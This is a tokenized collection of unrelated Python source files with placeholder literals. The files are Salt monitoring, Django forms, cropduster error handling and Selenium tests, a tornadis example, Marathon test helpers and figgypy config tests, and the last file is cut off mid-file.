<s> import datetime <EOL> import time <EOL> import salt . log <EOL> log = salt . log . getLogger ( __name__ ) <EOL> class MonitorTask ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , taskid , pyexe , context , scheduler = None ) : <EOL> self . taskid = taskid <EOL> self . code = pyexe <EOL> self . context = context <EOL> self . scheduler = scheduler <EOL> def run ( self ) : <EOL> log . trace ( '<STR_LIT>' , self . taskid ) <EOL> minion = self . context . get ( '<STR_LIT:id>' ) <EOL> collector = self . context . get ( '<STR_LIT>' ) <EOL> while True : <EOL> try : <EOL> exec self . code in self . context <EOL> except Exception , ex : <EOL> log . error ( "<STR_LIT>" , self . taskid , ex , exc_info = ex ) <EOL> if collector : <EOL> jid = datetime . datetime . strftime ( <EOL> datetime . datetime . now ( ) , '<STR_LIT>' ) <EOL> try : <EOL> collector ( minion , self . context [ '<STR_LIT>' ] , self . context [ '<STR_LIT:result>' ] ) <EOL> except Exception , ex : <EOL> log . error ( '<STR_LIT>' , self . taskid , exc_info = ex ) <EOL> if self . scheduler is None : <EOL> break <EOL> duration = self . scheduler . next ( ) <EOL> log . trace ( '<STR_LIT>' , self . taskid , duration ) <EOL> time . sleep ( duration ) <EOL> log . debug ( '<STR_LIT>' , self . taskid ) </s>
<s> from django . forms import Form , CharField , PasswordInput , ModelChoiceField <EOL> from django . contrib . auth . models import User <EOL> from django . forms import ModelForm <EOL> from contest import models <EOL> class RegistrationForm ( Form ) : <EOL> username = CharField ( label = '<STR_LIT>' , max_length = <NUM_LIT:50> ) <EOL> password = CharField ( widget = PasswordInput ) <EOL> def is_valid ( self ) : <EOL> valid = super ( Form , self ) . is_valid ( ) <EOL> if not valid : <EOL> return valid <EOL> uname = self . cleaned_data [ '<STR_LIT:username>' ] <EOL> users = User . objects . filter ( username = uname ) . count ( ) <EOL> if users > <NUM_LIT:0> : <EOL> self . _errors [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return False <EOL> else : <EOL> return True <EOL> class AttemptForm ( ModelForm ) : <EOL> class Meta : <EOL> model = models . Attempt <EOL> exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class ProfileForm ( ModelForm ) : <EOL> class Meta : <EOL> model = models . Profile <EOL> exclude = [ '<STR_LIT:user>' , '<STR_LIT>' ] </s>
<s> from lib import automata <EOL> import matplotlib . pyplot as plt <EOL> plt . ion ( ) <EOL> import numpy as np <EOL> import time <EOL> m , n = <NUM_LIT:100> , <NUM_LIT:100> <EOL> rule_string = '<STR_LIT>' <EOL> A = <NUM_LIT> * np . random . random ( m * n ) . reshape ( ( m , n ) ) <EOL> A = A . round ( ) <EOL> plt . figure ( ) <EOL> img_plot = plt . imshow ( A , interpolation = "<STR_LIT>" , cmap = plt . cm . gray ) <EOL> plt . show ( ) <EOL> while True : <EOL> A = automata ( A , rule_string ) <EOL> img_plot . set_data ( A ) <EOL> plt . draw ( ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> import six <EOL> from six . moves import xrange <EOL> import os <EOL> import sys <EOL> import logging <EOL> import copy <EOL> import errno <EOL> from django . core . urlresolvers import get_urlconf , get_resolver <EOL> from django . http import HttpResponse <EOL> from django . utils . safestring import mark_safe <EOL> try : <EOL> from django . utils . encoding import force_unicode <EOL> except ImportError : <EOL> from django . utils . encoding import force_text as force_unicode <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> SentryHandler = raven_client = None <EOL> try : <EOL> from sentry . client . handlers import SentryHandler <EOL> except ImportError : <EOL> try : <EOL> from raven . contrib . django . models import get_client <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> raven_client = get_client ( ) <EOL> if SentryHandler : <EOL> logger . addHandler ( SentryHandler ( ) ) <EOL> class FauxTb ( object ) : <EOL> def __init__ ( self , tb_frame , tb_lineno , tb_next ) : <EOL> self . tb_frame = tb_frame <EOL> self . tb_lineno = tb_lineno <EOL> self . tb_next = tb_next <EOL> def current_stack ( skip = <NUM_LIT:0> ) : <EOL> try : <EOL> <NUM_LIT:1> / <NUM_LIT:0> <EOL> except ZeroDivisionError : <EOL> f = sys . exc_info ( ) [ <NUM_LIT:2> ] . tb_frame <EOL> for i in xrange ( skip + <NUM_LIT:2> ) : <EOL> f = f . f_back <EOL> lst = [ ] <EOL> while f is not None : <EOL> lst . append ( ( f , f . f_lineno ) ) <EOL> f = f . f_back <EOL> return lst <EOL> def extend_traceback ( tb , stack ) : <EOL> """<STR_LIT>""" <EOL> head = tb <EOL> for tb_frame , tb_lineno in stack : <EOL> head = FauxTb ( tb_frame , tb_lineno , head ) <EOL> return head <EOL> def full_exc_info ( ) : <EOL> """<STR_LIT>""" <EOL> t , v , tb = sys . exc_info ( ) <EOL> full_tb = extend_traceback ( tb , current_stack ( <NUM_LIT:1> ) ) <EOL> return t , v , full_tb <EOL> def format_error ( error ) : <EOL> from generic_plus . 
utils import get_relative_media_url <EOL> if isinstance ( error , six . string_types ) : <EOL> return error <EOL> elif isinstance ( error , IOError ) : <EOL> if error . errno == errno . ENOENT : <EOL> file_name = get_relative_media_url ( error . filename ) <EOL> return u"<STR_LIT>" % file_name <EOL> return u"<STR_LIT>" % { <EOL> '<STR_LIT:type>' : error . __class__ . __name__ , <EOL> '<STR_LIT>' : error , <EOL> } <EOL> def log_error ( request , view , action , errors , exc_info = None ) : <EOL> error_msg = "<STR_LIT>" % ( action , format_error ( errors [ <NUM_LIT:0> ] ) ) <EOL> log_kwargs = { } <EOL> if not exc_info : <EOL> try : <EOL> exc_info = full_exc_info ( ) <EOL> except : <EOL> exc_info = None <EOL> if exc_info and not isinstance ( exc_info , tuple ) or not len ( exc_info ) or not exc_info [ <NUM_LIT:0> ] : <EOL> exc_info = None <EOL> if exc_info : <EOL> log_kwargs [ "<STR_LIT>" ] = exc_info <EOL> extra_data = { <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT>' : os . getpid ( ) <EOL> } <EOL> try : <EOL> import psutil , math , time , thread <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> p = psutil . Process ( os . getpid ( ) ) <EOL> proc_timestamp = time . strftime ( "<STR_LIT>" , time . localtime ( p . create_time ) ) <EOL> try : <EOL> create_usec = six . text_type ( p . create_time - math . floor ( p . create_time ) ) [ <NUM_LIT:1> : <NUM_LIT:5> ] <EOL> except : <EOL> create_usec = '<STR_LIT>' <EOL> proc_timestamp += create_usec <EOL> extra_data [ '<STR_LIT>' ] = proc_timestamp <EOL> extra_data [ '<STR_LIT>' ] = thread . get_ident ( ) <EOL> if isinstance ( errors [ <NUM_LIT:0> ] , CropDusterUrlException ) : <EOL> urlconf = get_urlconf ( ) <EOL> resolver = get_resolver ( urlconf ) <EOL> extra_data [ '<STR_LIT>' ] = { <EOL> "<STR_LIT>" : resolver . regex , <EOL> "<STR_LIT>" : resolver . urlconf_name , <EOL> "<STR_LIT>" : resolver . default_kwargs , <EOL> "<STR_LIT>" : resolver . namespace , <EOL> "<STR_LIT>" : resolver . 
urlconf_module <EOL> } <EOL> resolver_reverse_dict = dict ( <EOL> [ ( force_unicode ( k ) , resolver . reverse_dict [ k ] ) for k in resolver . reverse_dict ] ) <EOL> resolver_namespace_dict = dict ( <EOL> [ ( force_unicode ( k ) , resolver . namespace_dict [ k ] ) for k in resolver . namespace_dict ] ) <EOL> extra_data . update ( { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : resolver . regex , <EOL> "<STR_LIT>" : resolver . urlconf_name , <EOL> "<STR_LIT>" : resolver . default_kwargs , <EOL> "<STR_LIT>" : resolver . namespace , <EOL> "<STR_LIT>" : resolver . urlconf_module <EOL> } , <EOL> '<STR_LIT>' : resolver_reverse_dict , <EOL> '<STR_LIT>' : resolver_namespace_dict , <EOL> '<STR_LIT>' : resolver . app_dict , <EOL> '<STR_LIT>' : resolver . url_patterns , <EOL> '<STR_LIT>' : urlconf , <EOL> '<STR_LIT>' : '<STR_LIT>' % view , <EOL> } ) <EOL> raven_kwargs = { '<STR_LIT>' : request , '<STR_LIT>' : extra_data , '<STR_LIT:data>' : { '<STR_LIT:message>' : error_msg } } <EOL> if raven_client : <EOL> if exc_info : <EOL> return raven_client . get_ident ( <EOL> raven_client . captureException ( exc_info = exc_info , ** raven_kwargs ) ) <EOL> else : <EOL> return raven_client . get_ident ( <EOL> raven_client . captureMessage ( error_msg , ** raven_kwargs ) ) <EOL> else : <EOL> extra_data . update ( { <EOL> '<STR_LIT>' : request , <EOL> '<STR_LIT:url>' : request . path_info , <EOL> } ) <EOL> logger . error ( error_msg , extra = extra_data , ** log_kwargs ) <EOL> return None <EOL> def json_error ( request , view , action , errors = None , forms = None , formsets = None , log = False , exc_info = None ) : <EOL> from . utils import json <EOL> if forms : <EOL> formset_errors = [ [ copy . deepcopy ( f . errors ) for f in forms ] ] <EOL> elif formsets : <EOL> formset_errors = [ copy . deepcopy ( f . errors ) for f in formsets ] <EOL> else : <EOL> formset_errors = [ ] <EOL> if not errors and not formset_errors : <EOL> return HttpResponse ( json . 
dumps ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <EOL> content_type = '<STR_LIT:application/json>' ) <EOL> error_str = u'<STR_LIT>' <EOL> for forms in formset_errors : <EOL> for form_errors in forms : <EOL> for k in sorted ( form_errors . keys ( ) ) : <EOL> v = form_errors . pop ( k ) <EOL> k = mark_safe ( '<STR_LIT>' % { '<STR_LIT:k>' : k } ) <EOL> form_errors [ k ] = v <EOL> error_str += force_unicode ( form_errors ) <EOL> errors = errors or [ error_str ] <EOL> if log : <EOL> log_error ( request , view , action , errors , exc_info = exc_info ) <EOL> if len ( errors ) == <NUM_LIT:1> : <EOL> error_msg = "<STR_LIT>" % ( action , format_error ( errors [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> error_msg = "<STR_LIT>" % action <EOL> error_msg += "<STR_LIT>" <EOL> for error in errors : <EOL> error_msg += "<STR_LIT>" % format_error ( error ) <EOL> error_msg += "<STR_LIT>" <EOL> return HttpResponse ( json . dumps ( { '<STR_LIT:error>' : error_msg } ) , content_type = '<STR_LIT:application/json>' ) <EOL> class CropDusterException ( Exception ) : <EOL> pass <EOL> class CropDusterUrlException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterViewException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterModelException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterImageException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterFileException ( CropDusterException ) : <EOL> pass <EOL> class CropDusterResizeException ( CropDusterException ) : <EOL> pass </s>
<s> import os <EOL> import contextlib <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . admin . tests import AdminSeleniumWebDriverTestCase <EOL> from django . core . urlresolvers import reverse <EOL> from django . test . utils import override_settings <EOL> from selenium . webdriver . common . by import By <EOL> from selenium . webdriver . support . expected_conditions import ( <EOL> visibility_of_element_located , element_to_be_clickable ) <EOL> try : <EOL> import grappelli <EOL> except ImportError : <EOL> grappelli = None <EOL> from . helpers import CropdusterTestCaseMediaMixin <EOL> from . models import Article , Author , TestForOptionalSizes , TestForOrphanedThumbs <EOL> from . . models import Size , Thumb <EOL> @ override_settings ( ROOT_URLCONF = '<STR_LIT>' ) <EOL> class TestAdmin ( CropdusterTestCaseMediaMixin , AdminSeleniumWebDriverTestCase ) : <EOL> available_apps = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> if grappelli : <EOL> available_apps . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> webdriver_class = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> super ( TestAdmin , self ) . setUp ( ) <EOL> self . selenium . set_window_size ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . selenium . set_page_load_timeout ( <NUM_LIT:10> ) <EOL> User . objects . create_superuser ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def wait_until_visible_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until ( <EOL> visibility_of_element_located ( ( By . CSS_SELECTOR , selector ) ) , <EOL> timeout = timeout ) <EOL> def wait_until_clickable_xpath ( self , xpath , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until ( <EOL> element_to_be_clickable ( ( By . 
XPATH , xpath ) ) , timeout = timeout ) <EOL> def wait_until_clickable_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until ( <EOL> element_to_be_clickable ( ( By . CSS_SELECTOR , selector ) ) , <EOL> timeout = timeout ) <EOL> @ contextlib . contextmanager <EOL> def visible_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until_visible_selector ( selector , timeout ) <EOL> yield self . selenium . find_element_by_css_selector ( selector ) <EOL> @ contextlib . contextmanager <EOL> def clickable_selector ( self , selector , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until_clickable_selector ( selector , timeout ) <EOL> yield self . selenium . find_element_by_css_selector ( selector ) <EOL> @ contextlib . contextmanager <EOL> def clickable_xpath ( self , xpath , timeout = <NUM_LIT:10> ) : <EOL> self . wait_until_clickable_xpath ( xpath , timeout ) <EOL> yield self . selenium . find_element_by_xpath ( xpath ) <EOL> @ contextlib . contextmanager <EOL> def switch_to_popup_window ( self ) : <EOL> self . wait_until ( lambda d : len ( d . window_handles ) == <NUM_LIT:2> ) <EOL> self . selenium . switch_to . window ( self . selenium . window_handles [ <NUM_LIT:1> ] ) <EOL> yield <EOL> self . wait_until ( lambda d : len ( d . window_handles ) == <NUM_LIT:1> ) <EOL> self . selenium . switch_to . window ( self . selenium . window_handles [ <NUM_LIT:0> ] ) <EOL> def test_addform_single_image ( self ) : <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = reverse ( '<STR_LIT>' ) ) <EOL> browser = self . selenium <EOL> browser . find_element_by_id ( '<STR_LIT>' ) . send_keys ( '<STR_LIT>' ) <EOL> browser . find_element_by_css_selector ( '<STR_LIT>' ) . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . 
click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_xpath ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> author = Author . objects . all ( ) [ <NUM_LIT:0> ] <EOL> sizes = list ( Size . flatten ( Author . HEADSHOT_SIZES ) ) <EOL> self . assertTrue ( bool ( author . headshot . path ) ) <EOL> image = author . headshot . related_object <EOL> thumbs = image . thumbs . all ( ) <EOL> self . assertEqual ( len ( thumbs ) , len ( sizes ) ) <EOL> main_thumb = image . thumbs . get ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( main_thumb . to_dict ( ) , { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:width>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : image . pk , <EOL> '<STR_LIT:id>' : main_thumb . pk , <EOL> } ) <EOL> auto_thumb = image . thumbs . get ( name = '<STR_LIT>' ) <EOL> self . assertEqual ( auto_thumb . to_dict ( ) , { <EOL> '<STR_LIT>' : main_thumb . pk , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:width>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : image . pk , <EOL> '<STR_LIT:id>' : auto_thumb . pk , <EOL> } ) <EOL> def test_addform_multiple_image ( self ) : <EOL> author = Author . objects . create ( name = "<STR_LIT>" ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = reverse ( '<STR_LIT>' ) ) <EOL> browser = self . selenium <EOL> browser . find_element_by_id ( '<STR_LIT>' ) . send_keys ( "<STR_LIT>" ) <EOL> browser . find_element_by_css_selector ( '<STR_LIT>' ) . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . 
TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> browser . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> browser . find_element_by_xpath ( '<STR_LIT>' % author . pk ) . click ( ) <EOL> browser . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> article = Article . objects . all ( ) [ <NUM_LIT:0> ] <EOL> lead_sizes = list ( Size . flatten ( Article . LEAD_IMAGE_SIZES ) ) <EOL> alt_sizes = list ( Size . flatten ( Article . ALT_IMAGE_SIZES ) ) <EOL> self . assertTrue ( article . lead_image . path . endswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( len ( article . lead_image . related_object . thumbs . all ( ) ) , len ( lead_sizes ) ) <EOL> self . assertTrue ( article . alt_image . path . endswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( len ( article . alt_image . related_object . thumbs . all ( ) ) , len ( alt_sizes ) ) <EOL> def test_changeform_single_image ( self ) : <EOL> author = Author . objects . create ( name = "<STR_LIT>" , <EOL> headshot = os . path . join ( self . TEST_IMG_DIR_RELATIVE , '<STR_LIT>' ) ) <EOL> author . headshot . generate_thumbs ( ) <EOL> url = reverse ( '<STR_LIT>' , args = ( author . pk , ) ) <EOL> browser = self . selenium <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = url ) <EOL> elem = browser . 
find_element_by_id ( '<STR_LIT>' ) <EOL> elem . clear ( ) <EOL> elem . send_keys ( "<STR_LIT>" ) <EOL> old_page_id = browser . find_element_by_tag_name ( '<STR_LIT:html>' ) . id <EOL> browser . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_until ( lambda b : b . find_element_by_tag_name ( '<STR_LIT:html>' ) . id != old_page_id ) <EOL> self . assertEqual ( Author . objects . get ( pk = author . pk ) . name , '<STR_LIT>' ) <EOL> def test_changeform_multiple_images ( self ) : <EOL> author = Author . objects . create ( name = "<STR_LIT>" ) <EOL> article = Article . objects . create ( title = "<STR_LIT:title>" , author = author , <EOL> lead_image = os . path . join ( self . TEST_IMG_DIR_RELATIVE , '<STR_LIT>' ) , <EOL> alt_image = os . path . join ( self . TEST_IMG_DIR_RELATIVE , '<STR_LIT>' ) ) <EOL> article . lead_image . generate_thumbs ( ) <EOL> article . alt_image . generate_thumbs ( ) <EOL> url = reverse ( '<STR_LIT>' , args = ( article . pk , ) ) <EOL> browser = self . selenium <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = url ) <EOL> elem = browser . find_element_by_id ( '<STR_LIT>' ) <EOL> elem . clear ( ) <EOL> elem . send_keys ( "<STR_LIT>" ) <EOL> old_page_id = browser . find_element_by_tag_name ( '<STR_LIT:html>' ) . id <EOL> browser . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_until ( lambda b : b . find_element_by_tag_name ( '<STR_LIT:html>' ) . id != old_page_id ) <EOL> self . assertEqual ( Article . objects . get ( pk = article . pk ) . title , '<STR_LIT>' ) <EOL> def test_changeform_with_optional_sizes_small_image ( self ) : <EOL> test_a = TestForOptionalSizes . objects . create ( slug = '<STR_LIT:a>' ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , <EOL> login_url = reverse ( '<STR_LIT>' , args = [ test_a . pk ] ) ) <EOL> self . wait_page_loaded ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> self . selenium . execute_script ( '<STR_LIT>' % el . 
location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> self . selenium . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_page_loaded ( ) <EOL> test_a = TestForOptionalSizes . objects . get ( slug = '<STR_LIT:a>' ) <EOL> image = test_a . image . related_object <EOL> num_thumbs = len ( image . thumbs . all ( ) ) <EOL> self . assertEqual ( num_thumbs , <NUM_LIT:1> , "<STR_LIT>" % num_thumbs ) <EOL> def test_changeform_with_optional_sizes_large_image ( self ) : <EOL> test_a = TestForOptionalSizes . objects . create ( slug = '<STR_LIT:a>' ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , <EOL> login_url = reverse ( '<STR_LIT>' , args = [ test_a . pk ] ) ) <EOL> self . wait_page_loaded ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> self . selenium . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> self . selenium . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_page_loaded ( ) <EOL> test_a = TestForOptionalSizes . objects . get ( slug = '<STR_LIT:a>' ) <EOL> image = test_a . image . related_object <EOL> num_thumbs = len ( image . thumbs . all ( ) ) <EOL> self . 
assertEqual ( num_thumbs , <NUM_LIT:2> , "<STR_LIT>" % num_thumbs ) <EOL> def test_orphaned_thumbs_after_delete ( self ) : <EOL> test_a = TestForOrphanedThumbs . objects . create ( slug = '<STR_LIT:a>' ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , <EOL> login_url = reverse ( '<STR_LIT>' , args = [ test_a . pk ] ) ) <EOL> self . wait_page_loaded ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> self . selenium . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> self . selenium . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_page_loaded ( ) <EOL> test_a = TestForOrphanedThumbs . objects . get ( slug = '<STR_LIT:a>' ) <EOL> test_a . delete ( ) <EOL> num_thumbs = len ( Thumb . objects . all ( ) ) <EOL> self . assertEqual ( num_thumbs , <NUM_LIT:0> , "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> from tornado . ioloop import IOLoop <EOL> from tornado . web import RequestHandler , Application , url <EOL> import tornado . gen <EOL> import tornadis <EOL> import logging <EOL> logging . basicConfig ( level = logging . WARNING ) <EOL> POOL = tornadis . ClientPool ( max_size = <NUM_LIT:15> ) <EOL> class HelloHandler ( RequestHandler ) : <EOL> @ tornado . gen . coroutine <EOL> def get ( self ) : <EOL> with ( yield POOL . connected_client ( ) ) as client : <EOL> reply = yield client . call ( "<STR_LIT>" ) <EOL> if not isinstance ( reply , tornadis . TornadisException ) : <EOL> self . write ( "<STR_LIT>" % reply ) <EOL> self . finish ( ) <EOL> def make_app ( ) : <EOL> return Application ( [ <EOL> url ( r"<STR_LIT:/>" , HelloHandler ) , <EOL> ] ) <EOL> def main ( ) : <EOL> app = make_app ( ) <EOL> app . listen ( <NUM_LIT> ) <EOL> IOLoop . current ( ) . start ( ) <EOL> main ( ) </s>
<s> import errno <EOL> from functools import wraps <EOL> import os <EOL> import signal <EOL> import sys <EOL> import re <EOL> import time <EOL> import requests <EOL> from compose . cli import command <EOL> class TimeoutError ( Exception ) : <EOL> pass <EOL> def timeout ( seconds = <NUM_LIT:10> , error_message = os . strerror ( errno . ETIME ) ) : <EOL> def decorator ( func ) : <EOL> def _handle_timeout ( signum , frame ) : <EOL> raise TimeoutError ( error_message ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> signal . signal ( signal . SIGALRM , _handle_timeout ) <EOL> signal . alarm ( seconds ) <EOL> try : <EOL> result = func ( * args , ** kwargs ) <EOL> finally : <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> return result <EOL> return wraps ( func ) ( wrapper ) <EOL> return decorator <EOL> @ timeout ( <NUM_LIT:30> ) <EOL> def wait_for_marathon ( ) : <EOL> """<STR_LIT>""" <EOL> marathon_service = get_marathon_connection_string ( ) <EOL> while True : <EOL> print '<STR_LIT>' % marathon_service <EOL> try : <EOL> response = requests . get ( <EOL> '<STR_LIT>' % marathon_service , timeout = <NUM_LIT:2> ) <EOL> except ( <EOL> requests . exceptions . ConnectionError , <EOL> requests . exceptions . Timeout , <EOL> ) : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> continue <EOL> if response . status_code == <NUM_LIT:200> : <EOL> print "<STR_LIT>" <EOL> break <EOL> def get_compose_service ( service_name ) : <EOL> """<STR_LIT>""" <EOL> cmd = command . Command ( ) <EOL> project = cmd . get_project ( cmd . get_config_path ( ) ) <EOL> return project . get_service ( service_name ) <EOL> def get_marathon_connection_string ( ) : <EOL> if '<STR_LIT>' in os . environ . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> service_port = get_service_internal_port ( '<STR_LIT>' ) <EOL> local_port = get_compose_service ( '<STR_LIT>' ) . get_container ( ) . get_local_port ( service_port ) <EOL> if sys . platform == '<STR_LIT>' : <EOL> m = re . match ( "<STR_LIT>" , os . 
environ [ "<STR_LIT>" ] ) <EOL> local_port = "<STR_LIT>" . format ( m . group ( <NUM_LIT:2> ) , local_port . split ( "<STR_LIT::>" ) [ <NUM_LIT:1> ] ) <EOL> return local_port <EOL> def get_service_internal_port ( service_name ) : <EOL> """<STR_LIT>""" <EOL> return get_compose_service ( service_name ) . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] </s>
<s> import os <EOL> import unittest <EOL> import figgypy . config <EOL> class TestConfig ( unittest . TestCase ) : <EOL> def test_config_pass_on_int ( self ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> c = figgypy . config . Config ( '<STR_LIT>' ) <EOL> self . assertEqual ( c . number , <NUM_LIT:1> ) <EOL> def test_config_load_with_gpg ( self ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> c = figgypy . config . Config ( '<STR_LIT>' ) <EOL> self . assertEqual ( c . db [ '<STR_LIT:host>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( c . db [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_config_load_without_gpg ( self ) : <EOL> figgypy . decrypt . GPG_IMPORTED = False <EOL> c = figgypy . config . Config ( '<STR_LIT>' ) <EOL> encrypted_password = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( c . db [ '<STR_LIT:host>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( c . db [ '<STR_LIT>' ] . rstrip ( '<STR_LIT:\n>' ) , encrypted_password . rstrip ( '<STR_LIT:\n>' ) ) <EOL> if __name__ == 